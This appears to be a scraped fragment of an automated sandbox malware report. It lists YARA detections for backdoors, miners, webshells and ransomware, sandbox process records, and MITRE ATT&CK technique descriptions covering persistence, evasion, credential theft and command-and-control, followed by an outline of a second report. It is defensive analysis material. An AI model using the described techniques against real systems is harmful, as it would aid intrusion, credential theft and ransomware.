Detects Pupy backdoor, Source: 00000024.00000003.6301296808.00000197A4FB5000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6301296808.00000197A4FB5000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000024.00000003.6301296808.00000197A4FB5000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000024.00000003.6406830616.00000197A3D91000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000024.00000003.6406830616.00000197A3D91000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6406830616.00000197A3D91000.00000004.00000001.sdmp, Author: Joe Security Rule: Pupy_Backdoor, Description: Detects Pupy backdoor, Source: 00000024.00000003.6436059336.00000197A4C44000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6436059336.00000197A4C44000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6436059336.00000197A4C44000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6294115539.00000197A3970000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_PowerShell_IEX_Download_Combo, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000024.00000003.6432826435.00000197A3C46000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6432826435.00000197A3C46000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6289913928.00000197A39B3000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6289913928.00000197A39B3000.00000004.00000001.sdmp, Author: Joe Security Rule: APT_MAL_Sandworm_Exaramel_Configuration_Key, Description: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[..., Source: 00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp, Author: FR/ANSSI/SDO Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp, Author: Joe Security Rule: APT_Backdoor_Win_GoRat_Memory, Description: Identifies GoRat malware in memory based on strings., Source: 00000024.00000003.6288930033.00000197A47A0000.00000004.00000001.sdmp, Author: FireEye Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6308756420.00000197A3F60000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6308756420.00000197A3F60000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000024.00000003.6338624600.00000197A45E4000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000024.00000003.6338624600.00000197A45E4000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6338624600.00000197A45E4000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000024.00000003.6352553916.00000197A34AB000.00000004.00000001.sdmp, Author: Arnim Rupp
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate

Analysis Process: wevtutil.exe PID: 4104 Parent PID: 3224

General

Start time:	11:08:42
Start date:	08/10/2021
Path:	C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\3A24BB4C-F6EB-A1AC-C6CC-E780FED56A57.man
Imagebase:	0x7ff67d560000
File size:	291840 bytes
MD5 hash:	C57C1292650B6384903FE6408D412CFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: conhost.exe PID: 1412 Parent PID: 4104

General

Start time:	11:08:42
Start date:	08/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff778030000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: wevtutil.exe PID: 6840 Parent PID: 3224

General

Start time:	11:08:43
Start date:	08/10/2021
Path:	C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\3A24BB4C-F6EB-A1AC-C6CC-E780FED56A57.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
Imagebase:	0x7ff67d560000
File size:	291840 bytes
MD5 hash:	C57C1292650B6384903FE6408D412CFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: conhost.exe PID: 2644 Parent PID: 6840

General

Start time:	11:08:44
Start date:	08/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff778030000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: mpam-fad3e9a8.exe PID: 1248 Parent PID: 6040

General

Start time:	11:08:52
Start date:	08/10/2021
Path:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-fad3e9a8.exe
Imagebase:	0x7ff7755b0000
File size:	7855240 bytes
MD5 hash:	34B7B3BDFA61E18D3B2C3B0AC92B78EF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account.
Tactics:	Defense Evasion
Data Sources:	Authentication logs, File monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report FACTURA.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Metasploit

Threatname: CryLock

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Location Tracking:

Cryptography:

Exploits:

Privilege Escalation:

Bitcoin Miner:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre